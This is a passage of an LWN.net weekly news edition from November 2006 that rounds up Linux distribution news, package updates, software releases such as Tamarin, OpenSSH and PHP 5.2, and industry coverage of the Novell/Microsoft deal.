The Free Software Foundation has sent out a press release on the launch of the gNewSense distribution, based on Ubuntu. "With the avowed goal of providing a completely free distribution - one without non-free kernel binary 'blobs' or any other non-free software, the Free Software Foundation has announced sponsorship of the project. Ted Teah, FSF's free software directory maintainer explained, 'With all the kernel firmware and restricted repositories removed, and the reliance on Ubuntu's proprietary distribution management tool Launchpad gone, this distribution is the most advanced GNU/Linux distribution that has a commitment to be 100% free.'"

Full Story (comments: 40)

Announcing NetBSD 3.1

The NetBSD Project has announced the availability of NetBSD 3.1. This is the first feature update of the 3.0 branch. Changes include bugfixes, critical security updates and new minor features like new drivers.

Comments (none posted)

Distribution News

rPath Announces Support of Xen 3.0.3

rPath has announced the ability to create virtual appliances that run on the Xen 3.0.3 hypervisor using rPath's rBuilder.

Full Story (comments: none)

Canonical and Sun Expand Presence in the Enterprise

Sun Microsystems and Canonical have announced that the open-source Java Enterprise Edition 5 application server (specifically the GlassFish Community reference implementation) will be just an apt-get away for Ubuntu users. Also in this press release: "Canonical furthered its push into the enterprise by announcing imminent certification and support for Ubuntu on Sun's x64 (x86, 64-bit) hardware, powered by AMD Opteron(TM) processors."

Comments (none posted)

GNU-Darwin and SEDarwin

GNU-Darwin is a free, BSD-based distribution. Darwin is Apple's base for Mac OS X, without the proprietary bits. Add the ports system and package management from FreeBSD and all your favorite GNU tools and you have GNU-Darwin, a free Mac OS X compatible distribution for PowerPC and x86. The project has recently made available a new source archive.

A related project has also surfaced; SEDarwin, a port of the TrustedBSD Mandatory Access Control Framework to Darwin. From the announcement: "The October 31 snapshot includes the most recent SELinux kernel and user space components available. We are still working to adapt the Treysys reference policy for Apple's System, but the kernel and user space components are largely complete."

Comments (1 posted)

A Makeover for the MEPIS Desktop

MEPIS has announced a call for graphic designers. "From time to time, we hear from users who say that the look of the MEPIS desktop isn't on par with the quality of the MEPIS operating system. We tend to agree that the desktop could use a little makeover. The problem is that we just don't have the money to hire a professional to design a desktop, nor do we have the time to work on it ourselves. So this is a call to you graphic designers out there, and anybody else who would like to tackle the MEPIS desktop makeover. Please give us your comments and ideas, and also indicate whether you'd be interested in working on this project."

Comments (none posted)

New Distributions

Lintrack

Lintrack is a small, easy to configure and highly integrated GNU/Linux distribution for routers, firewalls, network access servers, content filters and more. It is targeted especially to small and medium-sized wireless Internet service providers. Lintrack joins our list at version 2.0, codenamed "Hockenheim". See the review section below for a review of Lintrack.

Comments (none posted)

Distribution Newsletters

Debian Weekly News - October 31st, 2006

The Debian Weekly News is back! This edition looks at the DebianHelp site, some weekly summaries by Joey Hess, a repository with ported applications for the Nokia 770 web tablet, source-less binary objects in the Debian Linux 2.6 packages, Practical Linux Day, videos of the Internationalisation Meeting, DebConf6 videos, and several other topics.

Full Story (comments: none)

Fedora Weekly News Issue 65

The Fedora Weekly News covers Fedora Core 6 Common Issues, Fedora Will Never Compromise, Cooperative Bug Isolation for FC6, Fedora speaking at FactFEST, Building and leading FOSS communities, Review: Prime time Fedora, Review: Innovations Continue, Review: Revisiting Fedora, and more.

Comments (none posted)

Gentoo Weekly Newsletter

The Gentoo Weekly Newsletter for October 30, 2006 looks at XMMS removal, #gentoo-uk information, CJK/Scheme/Turkish GWN translation teams looking for help, and other topics.

Comments (none posted)

Ubuntu Weekly News #20

The Ubuntu Weekly Newsletter for the week of October 22 - 28, 2006 covers Ubuntu 6.10, Firefox 2.0, topics chosen for Mountain View, last uploads to Edgy and much more.

Full Story (comments: none)

DistroWatch Weekly, Issue 176

The DistroWatch Weekly for November 6, 2006 is out. "Novell drops a bombshell on the Linux community. Signing an exclusive patent-protection agreement with Microsoft, a company that has been trying to discredit Linux at every opportunity, Novell claims that the deal is great for its customers. The community, however, is not impressed. In the meantime, CentOS, a project that provides a free clone of Red Hat Enterprise Linux, voices its concerns over the recently launched Oracle Enterprise Linux. In other news: find out how the Fedora code names are generated, check out the 100% "libre" gNewSense distribution, and install a bunch of scientific applications on your Ubuntu box with just one command. In our web log feature, we revisit Mandriva Linux 2007 and give away four boxes of its PowerPack edition. Finally, reader's input is sought for a dilemma about the increasingly aggressive linking of several Linux distributions to DistroWatch."

Comments (none posted)

Package updates

Fedora updates

Updates for Fedora Core 6: libxslt (upstream release 1.1.18), scim-bridge (update to 0.4.7), shadow-utils (bug fixes), evolution (update to 2.8.1.1), evolution-connector (update to 2.8.1), gnucash (update to 2.0.2), gtkhtml3 (update to 3.12.1), hplip (debugging patch), evolution-data-server (update to 1.8.1), bug-buddy (add extra information to autogenerated bug reports), pygtk2 (update to 2.10.3), rhgb (bug fix), shadow-utils (bug fixes), m17n-db (bug fixes), system-config-kickstart (bug fixes), m17n-db (bug fix), cvs (bug fix), bind (bug fixes), at (daylight-saving patch), nautilus (dynamically use beagle), yelp (dynamically use beagle), beagle (support dynamic use), setools (bump for FC6), selinux-policy (bump for FC6), gjdoc (bug fix), dvd+rw-tools (new version 7.0), htmlview (bug fix), vorbis-tools (fix charset conversion), yelp (fix crashes, improve info and man support), initscripts (bug fixes), python (update to python 2.4.4), python-docs (update to python 2.4.4), swig (determine architecture correctly), checkpolicy (latest update from NSA), cups (D-Bus signal fix), autofs (deal with changed semantics of mkdir in recent kernels), squid (stable upstream version), kdebase (rebuild), doxygen (update to 1.5.1).

Updates for Fedora Core 5: system-config-users (updated translations), kudzu (backport xen support), xen (update to xen-3.0.3), cvs (bug fix), at (daylight-saving patch), system-config-date (updated translations), gamin (bug fixes), sendmail (bug and security fixes), bind (bug fixes), cups (D-Bus signal fix), kdebase (KWin focus issue).

Comments (none posted)

Mandriva updates

Updates for Mandriva Linux 2007.0: jabber (properly initialize OpenSSL library).

Comments (none posted)

rPath updates

Updates for rPath Linux 1: rmake (bug fixes).

Comments (none posted)

Trustix updates

Updates for Trustix Secure Linux 2.2 & 3.0: imagemagick, libmcrypt, perl-dbd-pg, proftpd, spamassassin (various bug fixes).

Comments (none posted)

Ubuntu updates

Updates for Ubuntu 6.10: gfxboot-theme-ubuntu 0.2.10 (bug fix), ladder.app_1.0-2 (rebuild against latest libgnustep-gui-dev), lapispuzzle.app_1.0-2 (rebuild against latest libgnustep-gui-dev), displaycalibrator.app_0.7-3 (rebuild against latest libgnustep-gui-dev), dbconfig-common_1.8.25 (bug fixes), latex.service_0.1-3 (rebuild against latest libgnustep-gui-dev), cynthiune.app_0.9.5-4 (rebuild against latest libgnustep-gui-dev), dist-upgrader_20061031.1838 (bug fixes).

Updates for Ubuntu 6.06 LTS: there were 139 automated language-pack updates.

Comments (none posted)

Newsletters and articles of interest

How To Compile A Kernel - The Ubuntu Way (HowtoForge)

HowtoForge helps Ubuntu users build a custom kernel. "Each distribution has some specific tools to build a custom kernel from the sources. This article is about compiling a kernel on Ubuntu systems. It describes how to build a custom kernel using the latest unmodified kernel sources from www.kernel.org (vanilla kernel) so that you are independent from the kernels supplied by your distribution. It also shows how to patch the kernel sources if you need features that are not in there."

Comments (none posted)

Distribution reviews

Fedora Core 6 review (Software In Review)

Just in case any of you were looking for a thoroughly hostile review of Fedora Core 6: here's one in Software In Review. "The Fedora Project has failed six consecutive times to produce a viable desktop operating system. I say pack up, move on, and let Fedora Core die, but remember it fondly as the last of the holdouts from an era when desktop GNU/Linux meant missing out on most Web media while struggling to get network drivers installed and configured." The reviewer, clearly, would rather be running a proprietary system.

Comments (63 posted)

Knoppix 5.0.1: A solid live DVD (Linux.com)

Linux.com reviews the Knoppix 5.0.1 live CD/DVD distribution. "In the changes department, users of older Knoppix releases will appreciate the newer kernel, newer Xorg, even better hardware detection, newer KDE and GNOME, newer (and better) installer, and, generally speaking, newer everything. The amount of included software really can't be quantified in just words and figures. You get bundles of software for every KDE menu category, ranging from Education/Edutainment, Games, Toys, Multimedia, and Internet to Graphics, Development, Utilities, and System Tools."

Comments (1 posted)

Lintrack: Linux for Internet Service Providers (polishlinux.org)

Polishlinux.org reviews Lintrack. "Lintrack is a new GNU/Linux distribution for routers, firewalls, network access servers and more. It features new approaches to several areas such as system configuration and integration, but has many ideas inspired by traditional Linux distributions as well. I would like to introduce you to the project and provide step-by-step instructions for configuring Lintrack as a simple OSPF backbone router and a PPPoE network access server."

Comments (none posted)

Page editor: Rebecca Sobol

Development

Adobe donates Flash Player Scripting Engine to Mozilla

During the 2006 Web 2.0 Summit, Adobe Systems Incorporated and the Mozilla Foundation jointly announced the contribution of the source code for the Adobe ActionScript Virtual Machine, a component of the Adobe Flash Player, to the Mozilla Foundation. The software will be renamed the Tamarin Project and will be released under the standard Mozilla tri-license set (MPL/GPL/LGPL). From the announcement:

The Tamarin project will implement the final version of the ECMAScript Edition 4 standard language, which Mozilla will use within the next generation of SpiderMonkey, the core JavaScript engine embedded in Firefox®, Mozilla’s free Web browser. As of today, developers working on SpiderMonkey will have access to the Tamarin code in the Mozilla CVS repository via the project page located at www.mozilla.org/projects/tamarin/ . Contributions to the code will be managed by a governing body of developers from both Adobe and Mozilla.

“Adobe’s work on the new virtual machine is the largest contribution to the Mozilla Foundation since its inception,” said Brendan Eich, chief technology officer, Mozilla Corporation, and creator of JavaScript. “Now web developers have a high-performance, open source virtual machine for building and deploying interactive applications across both Adobe Flash Player and the Firefox web browser. We’re excited about joining the Adobe and Mozilla communities to advance ECMAScript.”

The aim of Tamarin is to create a standard scripting language for running interactive applications, Tamarin will work on both the Firefox browser and Adobe Flash Player. Tamarin will adhere to an Ecma International standard. The Tamarin Project's main page states:

The goal of the "Tamarin" project is to implement a high-performance, open source implementation of the ECMAScript 4th edition (ES4) language specification. The Tamarin virtual machine will be used by Mozilla within SpiderMonkey, the core JavaScript engine embedded in Firefox®, and other products based on Mozilla technology. The code will continue to be used by Adobe as part of the ActionScript(tm) Virtual Machine within Adobe® Flash® Player.

The Tamarin FAQ suggests that Tamarin will improve the performance of the Firefox browser:

AVM2, as currently shipping in Adobe Flash Player 9, was built from the ground up to work with the next generation of ActionScript. The new virtual machine is designed to deliver the performance and features to support the needs of rich Internet application developers. Source code from AVM2 being contributed to the Tamarin project implements ECMAScript 4th edition language features such as namespaces, classes, and optional strongly typed variables, and includes a Just In Time (JIT) compiler that translates ActionScript bytecode to native machine code for maximum execution speed.

and:

Adobe's contribution of source code from the ActionScript Virtual Machine to the Tamarin project accelerates the ability of developers to create and deliver richer, more interactive and engaging experiences that work across multiple platforms. Specifically, developers will be able to leverage the Tamarin code to create web applications that perform much faster in Firefox.

The FAQ also spells out the differences between JavaScript and ActionScript:

ActionScript and JavaScript are based on the same ECMA-262, 3rd edition language standard, but the libraries supporting ActionScript and JavaScript are different. For example, JavaScript is generally used within a browser and its Document Object Model (DOM) is browser window-, document-, and form-centric, while also supporting XML, event handling and Ajax. ActionScript executes within the Adobe Flash Player and its DOM is media centric, with support for animations, audio, text, and event handling.

A Linux branch of Tamarin has not yet been created, but should be available in several weeks. It will take a while before Tamarin is incorporated into Firefox, the current plan is for a release in 2008. Tamarin should be a truly useful addition to the long list of Mozilla projects.

See the initial LWN announcement for ongoing comments.

Comments (none posted)

System Applications

Database Software

MySQL 5.1.12 Beta released

Version 5.1.12 Beta of the MySQL DBMS is available for testing. "Be it that this is a Beta release, there are several incompatible changes that have happened since last release, and there's a tremendous amount of bug fixes--way too many to mention here (more than 500). We're providing a detailed list at http://dev.mysql.com/doc/refman/5.1/en/news-5-1-12.html".

Full Story (comments: none)

PostgreSQL Weekly News

The November 5, 2006 edition of the PostgreSQL Weekly News is online with the latest PostgreSQL DBMS articles and resources.

Full Story (comments: none)

Embedded Systems

BusyBox 1.2.2.1 released

Version 1.2.2.1 of BusyBox is out with the following change: "Added compile-time warning that static linking against glibc produces buggy executables."

Comments (2 posted)

LDAP Software

LAT 1.3.1 announced

Version 1.3.1 of LAT, the LDAP Administration Tool, is out. "This is the new development branch that will eventually become 1.4."

Full Story (comments: none)

Mail Software

Mailfromd 3.0 released

Stable version 3.0 of Mailfromd is available. "Mailfromd is a general-purpose mail filtering daemon for Sendmail. It is able to filter both incoming and outgoing messages using criteria of arbitrary complexity, supplied by the administrator in the form of a script file. The program interfaces with Sendmail using Milter protocol. Mailfromd provides the following basic features: flexible programming language for writing filter scripts, sender address verification, greylisting and whitelisting, controlling mail sending rate."

Comments (none posted)

Networking Tools

OpenSSH 4.5 released

OpenSSH 4.5 has been released. This is a bug fix release, which includes a fix for a bug in the sshd privilege separation monitor.

Full Story (comments: none)

Printing

CUPS 1.2.6 released

Version 1.2.6 of the Common UNIX Printing System has been announced. "CUPS 1.2.6 fixes some compile errors, localization of the web interface on Mac OS X, bugs in the lpc and lpstat commands, and backchannel support in the parallel backend."

Comments (none posted)

Virtualization Software

Linux-VServer 2.1.1 development release available

The Linux-VServer project has announced the availability of the 2.1.1 development release. There's a lot of new stuff in this one, including a new CPU scheduler, a number of new accounting options, a couple more supported filesystems, and more; click below for the details.

Full Story (comments: none)

Web Site Development

DataparkSearch 4.43 released

Stable version 4.43 of DataparkSearch has been announced. "DataparkSearch is an Internet and Intranet search engine tool."

Comments (none posted)

Zope News

The October 1-31, 2006 edition of Zope News is out with the latest Zope web development platform information.

Comments (none posted)

Miscellaneous

Cosmo 0.5 announced

Version 0.5 of Cosmo is out with new features and bug fixes. "Cosmo is a calendar server. With your favorite calendar program (Chandler, Apple iCal, Mozilla Sunbird, or any other WebDAV or CalDAV enabled client), you can share your calendar with other people by publishing it to Cosmo. Once your calendar is stored in the server, others can subscribe to it – and even modify it, if you have given them permission."

Full Story (comments: none)

Desktop Applications

Audio Applications

Alpha release of Aliki announced

An alpha release of Aliki, a software package for room impulse response measurement, is out. "This is basically the code used at the LAC2006 workshop, cleaned up a b[i]t."

Full Story (comments: none)

Ardour 2.0 beta 7.1 released

Version 2.0 beta 7.1 of Ardour, a multi-track audio recording and editing package, is out. "After a frenetic week or two of activity, many fixes to the biggest problems seen in beta6 have been completed, and work on the backlog of issues in the bugtracker has commenced. This means you can now get 2.0 beta 7.1 as a tarball release."

Comments (none posted)

Snd-ls 0.9.7.7 and Ceres V0.46 announced

A dual release of Snd-ls 0.9.7.7, a distribution of the sound editor SND and Ceres 0.46, a sound effect and sonogram display program, has been announced.

Full Story (comments: none)

Desktop Environments

Dropline GNOME 2.16.1 released (GnomeDesktop)

GnomeDesktop has announced the availability of version 2.16.1 of dropline GNOME, a GNOME distribution for Slackware Linux. "There have been several changes since our previous major release. As part of our efforts to slim things down, the total number of packages has been decreased by almost 13%. This was possible by eliminating rebuilds of several packages that are now included in Slackware by default, and restructuring the multimedia framework to eliminate several libraries that we felt weren’t needed. Additionally, we’ve also made the decision to discontinue the inclusion of a custom X11 build with this release, as we’ve found that Slackware’s X11 6.9.0 build was more than suitable."

Comments (none posted)

GNOME Software Announcements

The following new GNOME software has been announced this week: You can find more new GNOME software releases at gnomefiles.org.

Comments (none posted)

KDE Software Announcements

The following new KDE software has been announced this week: You can find more new KDE software releases at kde-apps.org.

Comments (none posted)

Second KDE 4 Developers Snapshot Available (KDE.News)

KDE.News has announced the availability of the second KDE 4 developers snapshot. "This 3.80.2 release includes source from all the KDE modules. Application developers are strongly advised to work primarily on KDE 4 from now on. This release builds with Qt 4.2.0 and 4.2.1 (but not the 4.2 preview). Packages are available for Kubuntu and currently working through the SUSE buildservice."

Comments (none posted)

KDE Commit-Digest (KDE.News)

The November 5, 2006 edition of the KDE Commit-Digest has been announced. The content summary says: "Work on porting kdegames applications to SVG and other general improvements continues at a fast pace. Work continues on video support in KPhotoAlbum. Krita gets a new star shape tool. Okular gets support for freehand ink overlays in presentation mode. Kate gets syntax highlighting support for ActionScript and RapidQ code. Mailody continues to mature as an alternative email client. Strigi refactors to allow searching within multiple simultaneous indexes, with preliminary interoperability with Akonadi on the horizon."

Comments (none posted)

Xfce 4.4 Release Candidate 2 released

Release Candidate 2 of Xfce 4.4 has been announced. "The second and hopefully last release candidate of the Xfce 4.4 desktop is now available for download. This release focuses primarily on bug fixes and optimizations." See the changelog for more information.

Comments (none posted)

Electronics

USB FPGA Board 0.1 announced

Version 0.1 of the USB FPGA Board has been announced. "The USB FPGA Project is a set of tools that can be used to interface the PC with other hardware development boards through USB. Currently a couple different FPGA prototype boards are supported. The focus is to design and develop USB FPGA projects, providing a PC interface to different USB FPGA designs. On this site PC software, USB controller firmware, FPGA HDL, and other embedded firmware can be found."

Comments (none posted)

Games

Stars above us (WorldForge)

The WorldForge virtual world project has announced the addition of a sky display. "Something that Ember’s been missing for a long time now is a dynamic sky. Instead it has had a static sky, with a static sun, always shown as middle of the day. However, through the addition of the Caelum project from the Ogre community Ember now finally has a dynamic sky."

Comments (1 posted)

GUI Packages

PyQt v4.1 Released

Version 4.1 of PyQt, the Python bindings for Qt v4, is available. Changes include support for Qt 4.2, a new QtTest module and more.

Full Story (comments: none)

XCB 1.0 release candidate 3 now available

Release candidate 3 of XCB 1.0 is out with bug fixes and other enhancements. "libxcb provides an interface to the X Window System protocol, slated to replace the current Xlib interface. It has several advantages over Xlib".

Full Story (comments: none)

Medical Applications

OpenEMR vulnerability disclosed (LinuxMedNews)

LinuxMedNews mentions that a security vulnerability has been found in the OpenEMR medical record system. "Apparently, there are several places in OpenEMR where there is an unchecked GET parameter passed in. So OpenEMR is expecting a value on the local filesystem, however, you can pass in a URL for unexpected results."

Comments (1 posted)

Office Suites

OpenOffice.org Newsletter

The October, 2006 edition of the OpenOffice.org Newsletter is online with the latest OpenOffice.org office suite developments.

Full Story (comments: none)

Languages and Tools

Caml

Caml Weekly News

The November 7, 2006 edition of the Caml Weekly News is out with new Caml language articles.

Full Story (comments: none)

Haskell

Haskell Weekly News

The November 8, 2006 edition of the Haskell Weekly News is online. This week brings a new release of SmallCheck and Hoogle, as well as the revival of the Monad.Reader.

Comments (none posted)

Java

Advanced Java Content Repository API (O'Reilly)

Sunil Patil introduces the Java Content Repository API on O'Reilly. "Java Content Repository (JCR) API, specified as JSR-170, is an attempt to standardize an API used for accessing content repositories. In this article, we'll talk about the advanced and optional features defined in the JCR API. We assume that you're already familiar with basic features of JCR--such as how to add a new node or property, how to configure Apache Jackrabbit, etc."

Comments (none posted)

Lisp

McCLIM 0.9.3 released

Version 0.9.3 of McCLIM, an open-source implementation of the CLIM 2 (Common Lisp Interface Manager) specification, is out with a new gtkairo backend, new features and bug fixes.

Full Story (comments: none)

Perl

Fun with Cross-Platform Shared Libraries (O'Reilly)

chromatic discusses the use of Perl and cross-platform shared libraries in an O'Reilly article. "I have a little project called Parrot::Embed. It’s a Perl 5 extension that makes Parrot available to Perl 5 programs. Parrot makes a shared library called libparrot. The actual parrot executable is usually just a little program which uses this shared library. This is very handy for my extension; I can use all of the public functions in the shared library myself. Actually building this code is trickier than it should be, however. Linking Perl 5 to libparrot requires a little bit of C code, itself a shared library that perl can load through the DynaLoader module. That’s easy and handy and even though I know how it works, I don’t need to know how it works in order to use it. When Parrot::Embed loads, it attempts to load libparrot and that’s where my troubles begin. Why?"

Comments (none posted)

Weekly Perl 6 mailing list summary (O'Reilly)

The Weekly Perl 6 mailing list summary for October 29 - November 4, 2006 is out with coverage of the Perl 6 mailing lists.

Comments (none posted)

PHP

PHP 5.2.0 released

Version 5.2.0 of PHP has been announced. "This release is a major improvement in the 5.X series, which includes a large number of new features, bug fixes and security enhancements." See the release announcement for more information.

Comments (none posted)

Python

PyEnchant 1.2.0 released

Version 1.2.0 of PyEnchant has been announced, it includes several new capabilities. "Enchant is the spellchecking package behind the AbiWord word processor, is being considered for inclusion in the KDE office suite, and is proposed as a FreeDesktop.org standard. It's completely cross-platform because it wraps the native spellchecking engine to provide a uniform interface. PyEnchant brings this simple, powerful and flexible spellchecking engine to Python".

Comments (none posted)

python-dev Summary

The python-dev Summary is out with coverage of the python-dev mailing list for the period of September 1-15, 2006.

Full Story (comments: none)

python-dev Summary

The python-dev Summary is out with coverage of the python-dev mailing list for the period of September 16-30, 2006.

Full Story (comments: none)

Dr. Dobb's Python-URL!

The November 7, 2006 edition of Dr. Dobb's Python-URL! is online with a new collection of Python article links.

Full Story (comments: none)

Tcl/Tk

Dr. Dobb's Tcl-URL!

The November 7, 2006 edition of Dr. Dobb's Tcl-URL! is online with new Tcl/Tk articles and resources.

Full Story (comments: none)

XML

Migrating to XForms (O'Reilly)

Paul Sobocinski works with XForms on O'Reilly's XML.com. "Paul Sobocinski explains how to start using XForms now by showing PHP code that will convert from XHTML to XForms and back to XHTML."

Comments (none posted)

Page editor: Forrest Cook

Linux in the news

Recommended Reading

Ten ideas about Ideas (Linux Journal)

Doc Searls has some ideas about ideas and venture capital. "Which has more leverage in the marketplace -- A) disclosure or B) secrecy? Which is more supportive of growing markets -- A) public infrastructure or B) private platforms? Which is better for inventive entrepreneurs -- A) sharing one's great ideas to drive development and adoption, or B) patenting and keeping secret one's "intellectual property"? 'm sure most Linux Journal readers would answer "A" to each of those questions, plus other questions like them. Yet I suspect that most venture capitalists would rather fund the "B" choices."

Comments (1 posted)

Red Hat downplays Novell/Microsoft deal (ArsTechnica)

ArsTechnica looks at Red Hat's response to the Novell/Microsoft announcement. "In response to a recent agreement between Microsoft and Novell, Red Hat's corporate secretary Mark Webbink has predicted that Red Hat "will be the dominant player in the Linux market" a year from now, and that "by that time there won't be any other Linux players." In light of Microsoft's partnership with Novell and Oracle's ambitions of Linux support dominance, Webbink's statement doesn't seem all that realistic."

Comments (23 posted)

Linux on More Dell Client Systems? (Direct2Dell)

The Direct2Dell blog discusses the topic of Linux on client systems. "If you buy a Dell notebook and run Linux on it, does Dell's hardware warranty still apply? Absolutely. You'll need to demonstrate you're having a hardware problem using the Dell Diagnostics CD. Will Dell (today) provide full Linux software support for that system? No. You'll be counting on a community support model for software issues, but many people are already a part of that global community and it suits them just fine." (Found on Don Marti's blog.)

Comments (38 posted)

Trade Shows and Conferences

2006 Italian Linux Day: A nationwide success (Linux.com)

Linux.com covers the 2006 Italian Linux Day. "The 2006 edition of Italian Linux Day on October 28 was the first in the six-year history of the event to be celebrated in more than 100 cities in every corner of the country. The prime-time news program on the main national TV channel TG1 spent almost two minutes on a story about the event ("and they didn't even make mistakes!", a LUG activist said)."

Comments (none posted)

Companies

Motorola picks home for its open-source Java (ZDNet)

ZDNet looks at Motorola's plans for their Java Micro Edition. "Motorola plans to build an open-source version of Java for gadgets such as mobile phones within the framework of the Apache Software Foundation. The work to develop the Java Micro Edition (ME) software will use the Apache License, Motorola said Tuesday, inviting others to participate in creating "a complete Java ME software stack." The move follows the company's pledge in May to release its software relating to a cell phone variant of Java ME called MIDP (Mobile Information Device Profile) 3.0."

Comments (none posted)

Novell and Microsoft partnering on Linux? (Linux-Watch)

Linux-Watch discusses a possible deal between Novell and Microsoft. "Sources close to Novell indicate that a deal with Microsoft concerning Linux will be announced today, Nov. 2, at 2 PM Pacific time in San Francisco. While this may sound as likely as George Bush and John Kerry singing a duet together, the Wall Street Journal is reporting that Microsoft Corp. will be announcing it will offer sales support for Novell Inc.'s SUSE Linux family."

Comments (27 posted)

Why Microsoft won't assault Linux (ZDNet)

John Carroll - who happens to work for Microsoft - talks about why he thinks Microsoft will not go after Linux in this ZDNet posting. "It sure looks like Microsoft is working very hard to achieve a detente with open source. They are working with Zend to improve the PHP developer experience atop Windows. They are granting full access to the source code for Windows CE 6.0 (though that benefits Microsoft as much as programmers). They just blessed Mono, an open source version of the .NET runtime, through their Novell agreement. What's the point of all that if they are just going to light the world on fire with a subsequent legal bombs on Linux?"

Comments (11 posted)

Linux Adoption

Behind the upsurge in Chinese open source communities (NewsForge)

NewsForge takes a look at Linux in China. "When Novell and Red Hat set up open source communities in China last year, most Chinese companies merely watched. Recently, however, China-based software companies have begun to show a greater interest in creating communities of their own. TurboLinux and Red Flag have created Whitefin and Linux-Ren, respectively. Red Flag also plans to create two additional open source communities -- UMPC (with Intel) and OpenAsianux -- before the end of this year. Why have Chinese companies suddenly changed their tunes?"

Comments (none posted)

LiMux The Penguin: Deep into Munich's Linux F/OSS migration (LinuxWorld)

LinuxWorld Magazine looks at the city of Munich and its move to Linux. "Munich's Linux migration has been a publicity frenzy, a software patent poster child, and the subject of a debate on the role of government in technology mandates. Now it's a real-life IT project, and the key to success is training, management, and replacing 170 non-Linux applications."

Comments (none posted)

Legal

JPEG Patent Claim Surrendered! (Groklaw)

The JPEG patent claims are over, according to this article on Groklaw. "Here you go, straight from the Public Patent Foundation's press release: Forgent Networks has stopped asserting its patent against JPEG, has dropped all its pending cases that were asserting the patent, and says that it won't file any other infringement claims based on the patent. You'll recall that PubPat challenged the patent last year and the USPTO reexamination led to rejection of the broadest claims."

Comments (1 posted)

Interviews

KDE and Distributions: MEPIS Interview (KDE.News)

KDE.News has posted an interview with Warren Woodford. "The MEPIS distribution has been one of the bigger KDE-centric distributions around for some years now, created to make desktop GNU/Linux easier to use. As part of our KDE and Distributions series founder and main contributor Warren Woodford talks to KDE Dot News about the history and current vision of the distribution."

Comments (none posted)

Inside the Hacker's Profiling Project (NewsForge)

NewsForge has an interview with Stefania Ducci, co-founder of the Hacker's Profiling Project (HPP). "Imagine being able to preview an attacker's next move based on the traces left on compromised machines. That's the aim of the Hacker's Profiling Project (HPP), an open methodology that hopes to enable analysts to work on the data (logs, rootkits, and any code) left by intruders from a different point of view, providing them with a profiling methodology that will identify the kind of attacker and therefore his modus operandi and potential targets."

Comments (11 posted)

Resources

Setting Up a Game Server with BZFlag (Linux Journal)

The Linux Journal has a lengthy article (a book chapter, actually) on setting up a BZFlag server. "BZFlag is a fun 3D tank battle game, designed to be played against others over a network. After you set up a BZFlag server, you can have players battle each other over the network using clients on other Linux, BSD, Mac OS X, or Windows systems."

Comments (1 posted)

Scaling Enterprise Java on 64-bit Multi-Core X86-Based Servers (O'ReillyNet)

Michael Yuan and Dave Jaffe discuss the implementation of Enterprise Java on 64 bit systems in an O'Reilly article. "Today's enterprise server--indeed, the environment--isn't what it was when Java was born. Slow networked machines have been replaced by fast, 64-bit multi-core servers that can house all your tiers in one box or even virtualize servers within the server. This has a significant effect on the design and deployment of your Java enterprise application, and Michael Yuan and Dave Jaffe show you how to get the most out of your hardware."

Comments (none posted)

Linux Gazette #132 is out!

Issue #132 of the Linux Gazette has been announced. "Linux Gazette is a volunteer-run monthly web magazine dedicated to two simple ideas: making Linux a little more fun, and sharing ideas and discoveries."

Full Story (comments: none)

Mathematics on a UNIX workstation (IBM developerWorks)

Bill Zimmerly discusses a number of UNIX compatible mathematics tools in an IBM developerWorks article. "Mathematics is the King of Science. Commercial uses for mathematical workstations are vast: From basic engineering to designer drugs and from gene therapy to celestial navigation, mathematics rules the world. And there is no lack of computer programs to assist people in solving mathematical problems in their chosen field. The remainder of this article describes several commercial and open source systems that might prove valuable in your field of endeavor."

Comments (none posted)

Remotely Manage Machines Using VNC (Debian Admin)

Debian Admin is running a tutorial article on the use of VNC software under Debian. "VNC stands for Virtual Network Computing. It is, in essence, a remote display system which allows you to view a computing `desktop’ environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures."

Comments (none posted)

Reviews

Of Macros And Drum Machines (Linux Journal)

Dave Phillips looks at two very different software drum machines. "This week in my random survey of activity on the mail-lists for Linux sound & music software I'll look at two very different software drum machines and a keystroke macro that enters LilyPond music notation into an Open Office text document. And if that isn't enough I've included four thrilling screenshots and links to three entertaining audio files to entice and maintain your interest. Read on for more..."

Comments (none posted)

Review: GnuCash 2.0 (Linux.com)

Linux.com reviews GnuCash. "GnuCash is a personal and small business accounting package that provides true double-entry accounting, the ability to set up automatic recurring transactions, and simple budgeting. The application does not try to hide the complexities of managing your money from you with pretty screens. It does show you where (and how much) you're spending your money. If you're prepared to learn a subtly different way of doing things, you will find GnuCash a very powerful alternative for home or small business use."

Comments (2 posted)

Downloading bliss with Metalink (Linux.com)

Linux.com looks at Metalink. "Getting popular software off the Internet can sometimes be a struggle, even with all the mirrors and BitTorrent Samaritans out there. When the Fedora project released Fedora Core 6 last month, for instance, even several dozen mirrors weren't enough to serve everyone, and torrent speeds weren't good enough because of a scarcity of seeders. But thanks to Metalink I was able to sleep while my FC6 ISOs were downloading."

Comments (4 posted)

QBrew: Home-brewed software for home brewers (NewsForge)

NewsForge reviews QBrew. "When I'm not hacking or writing about hacking, I'm brewing beer. When I say I'm brewing beer, I don't mean that I'm taking some syrupy stuff and adding it to boiling water and hoping for the best. I mean I'm buying various types of grains, various types of hops, some yeast, and potentially some other additives to help balance my brewing water or the pH levels at some point in my brewing process. Now, you can't go throwing all of this stuff together in random quantities and expect to hit your target flavor or style of beer. You need a recipe. This is where QBrew comes in. QBrew is an open source application to aid you in developing a recipe for home brewed beer."

Comments (1 posted)

Righteous Software Releases Linux-based Backup Server (W3Reports)

W3Reports looks at Righteous Backup Server from Righteous Software, a commercial application. "The new product, which offers nearly continuous backups for Linux servers—a technology that remains unmatched in the industry—runs on a standalone server and can provide disk-based backup services for up to three hundred Linux servers simultaneously. The solution also includes open file backups, point-in-time snapshots, and requires no 3rd party applications."

Comments (none posted)

Smart Boards Get Linux Support (EFYTimes)

EFYTimes reviews a Linux-compatible electronic white board from SMART Technologies Inc. "“Linux, which is increasing in popularity around the world, provides a highly functional operating system for SMART product users,” says Nancy Knowlton, SMART’s president and co-CEO. “The release of SMART Board software 9.5 for Linux demonstrates SMART’s commitment to meeting the ever-evolving needs of our customers worldwide.” SMART Technologies Inc. develops software to control the interaction between smart board and a computer system. Smart Board is an electronic whiteboard writing surface which can capture writing electronically in group presentation situations such as teaching."

Comments (none posted)

VMX Builder: Create virtual machines in minutes (Linux.com)

Linux.com takes a look at VMX Builder. "While VMware Player is not designed to create virtual machines from scratch, other tools can help you to build your own VMs in a matter of minutes. You could use VMware's free VMware Server software, but it's overkill if you only need a quick-and-dirty way to build a VM. Instead, consider VMX Builder, an easy-to-use desktop tool for creating VMware virtual machines."

Comments (3 posted)

Miscellaneous

